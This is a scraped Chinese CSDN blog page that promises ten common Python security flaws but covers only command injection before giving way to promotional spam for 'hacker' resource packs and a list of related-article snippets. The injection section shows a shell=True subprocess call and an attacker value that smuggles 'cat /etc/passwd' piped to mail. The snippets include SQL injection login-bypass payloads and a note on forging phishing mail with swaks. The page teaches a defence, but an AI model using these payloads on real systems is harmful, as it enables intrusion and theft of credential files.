Python 开发中 10 个常见的安全漏洞_python安全漏洞(2)

于 2024-05-17 05:13:56 发布
阅读量863 收藏 18
点赞数 24
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60453176/article/details/138987021
版权

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  1. 输入注入(Input injection)

注入攻击非常广泛而且很常见,注入有很多种类,它们影响所有的语言、框架和环境。

命令注入可能在使用popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生,当调用本地命令时,有人可能会将某些值设置为恶意值。

下面是个简单的脚本,使用用户提供的文件名调用子进程:

import subprocess

def transcode_file(request, filename):

command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)

subprocess.call(command, shell=True)  # a bad idea!

攻击者会将filename 的值设置为“; cat / etc / passwd | mailthem@domain.com 或者其他同样危险的东西。

修复:

如果你使用了Web 框架,可以用附带的实用程序对输入进行清理,除非有充分的理由,否则不要手动构建 SQL 查询,大多数 ORM 都具有内置的消毒方法。

对于shell,可以使用 shlex 模块正确地转义输入。

  1. assert 语句(Assert statements)

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

前端星级导师
关注
  • 24
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RabbitMQ 超详细入门篇
Java.慈祥
01-24 4078
RabbitMQ 入门篇???? MQ 的基本概念: 什么是 MQ ? MQ全称为Message Queue即消息队列 "消息队列" 是在消息的传输过程保存消息的容器 它是典型的:生产者————消费者模型 生产者不断向消息队列生产消息 ———————— 消费者不断的从队列获取消息. 这样的好处: 生产者只需要关注发消息,消费者只需要关注收消息,二者没有业务逻辑的侵入,这样就实现了生产者和消费者的解耦. 为什么要使用 MQ? 或者说MQ 有什么好处,MQ 主要可以实现三种功能: 服务解耦
VMware虚拟机安装win7教程(图文版 超详细!)
热门推荐
weixin_48886225的博客
10-30 5万+
14.点击自定义硬件,在CD/DVD选择使用ISO镜像文件,选择刚才下载好的镜像,然后点击高级选择IDE,点击确定,然后点击完成。5.操作系统选择Microsoft Windows,版本选择Windows7,然后点击下一步。2.点击操作系统找到win7,然后点击详细信息,复制下面ed2k,使用迅雷进行下载。7.点击新建,然后创建两个新的分区,一个用来放系统,另一个用来安装其他软件。13.可以选择拆分成多个文件,方便后面分区,点击下一步。9.选择主分区,点击下一步,然后进入安装。
ISBN信息查询api接口
Wewe的博客
04-08 2072
"bookDesc": "《超级漫画素描技法:头身比篇素描》强调素描要在一开始的时候就做好决定。要把什么东西画成什么样子呢?“把这个东西画成这个样子。"bookName": "超级漫画素描技法.基础篇","author": "林晃,松本刚彦,森田和明","clcName": "素描、速写技法","format": "16开-胶版纸","press": "国青年出版社","pressPlace": "北京","binding": "平装","pages": "416页",伽薇 809137232。
探索《DoubanAPI》:解锁豆瓣数据的力量
最新发布
gitblog_00094的博客
04-24 429
探索《DoubanAPI》:解锁豆瓣数据的力量 项目地址:https://gitcode.com/Yun-cong/DoubanAPI 项目简介 在GitCode上,你可以找到一个名为DoubanAPI的开源项目,它是一个非官方的、基于Python编写的豆瓣(Douban)接口库。这个项目旨在帮助开发者和数据爱好者轻松地获取并处理豆瓣网站上的公开信息,如图书、电影、小组等各类资源的数据。 技术分析...
ctfshow web入门(2)
2202_75317918的博客
09-21 220
ctfshow web入门(2)
邮件发送工具swaks基础使用与邮件SPF配置漏洞简析
Alexz__的博客
04-16 6620
1.swaks工具使用 2.什么是邮件的SPF配置 3.SPF漏洞简析 4.SPF漏洞修复方案 壹 swaks工具的使用 (怎么这么多瑞士军刀.....) 一般来说kali自带: 基础用法: swaks –to <要测试的邮箱> 用来测试邮箱的连通性 我们先申请一个临时邮箱:http://24mail.chacuo.net/enus ...
RabbitMQ 从入门到放弃
trouble is a friend
01-16 2077
上一篇文章,我们使用Docker将rabbitmq安装好了,可以参考 docker安装rabbitmq 。下面,基于此rabbitmq服务,做一些实际的操作,包括原生的使用以及spring boot对于rabbitmq的支持。 本文很多概念,截取于rabbitMQ实战指南。 概念 什么是消息间件? 消息(Message)是指在应用间传送的数据。 消息间件(Message Queu...
关于Djangomodels外键显示为object
weixin_44013915的博客
04-08 1830
我在使用django框架时,在models写了一个建筑表building和房间表room,其房间表引用建筑表的建筑编号作为外键,但是在后台显示显示为object(1) models.py(建筑表) class building(models.Model): building_id=models.AutoField('建筑编号',primary_key=True) building_name=models.CharField('建筑名称',max_length=100) rem
推荐:根据ISBN号查询图书信息的API - 豆瓣API
杨江的IT分享专栏
06-19 3万+
找了半天,还是豆瓣的API简单易用~~~示例:https://api.douban.com/v2/book/isbn/:9787111128069结果:{"rating":{"max":10,"numRaters":2576,"average":"9.3","min":0},"subtitle":"","author":["(美)Brian W. Kernighan","(美)Dennis M.
VMware安装Win7虚拟机
Cheng_Q的博客
06-16 2万+
VMware安装Win7虚拟机
swaks使用教程
流浪法师的博客
12-30 1万+
swaks使用教程
swaks伪造钓鱼邮件
Ray
03-16 1万+
声明:文章仅供学习交流!!! swaks-SMTP协议下的瑞士军刀 kali Linux自带 基本使用语法: 1 swaks --to 123@qq.com     //测试邮箱的连通性; 2 选项说明:(更多高级功能请查man手册) --from  000@qq.com     //发件人邮箱; --ehlo  qq.com      //伪造邮件ehlo头,即是发件人邮箱的域名。
windows 下跟踪日志的几个工具总结
hejisan的专栏
05-24 4955
1、baretailpro.exe2、wintail.exe3、vim(using tail bundle plugin)4、Notepad++ (Plugin-&gt;Plugin Manager-&gt;Show Plugin Manager-&gt;Document Monitor-&gt;install ; then, reopen : Plugins-&gt;Document Monit...
07.计算机网络--- VMware虚拟机的三种网络模式
weixin_43880061的博客
07-23 1675
vmware为我们的网卡提供了三种工作模式,分别是桥接模式、NAT模式、仅主机模式。不同模式给虚拟机带来的上网效果也是不同的,那我们应该如何选择合适的网卡模式呢?首先,我们可以看到windows里面的网卡设置那边,在安装了vmware后,会多出两块网卡VMwareNetworkAdapterVMnet1和VMwareNetworkAdapterVMnet8,这两块网卡是安装了vmware才会有的,分别对应的是仅主机模式和NAT模式。......
CSS重置样式表
雷爷的博客
09-03 2349
CSS重置样式表 /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre...
ctfshow web2
m0_63253040的博客
03-12 1711
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
Python网络安全实战:系统漏洞扫描与工具解析
"Python网络安全项目开发实战,通过扫描漏洞和编程案例解析来深入理解网络安全实践。" 在当前数字化时代,网络安全显得尤为重要,而Python语言因其强大的库支持和易读性,成为了网络安全领域不可或缺的工具。本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值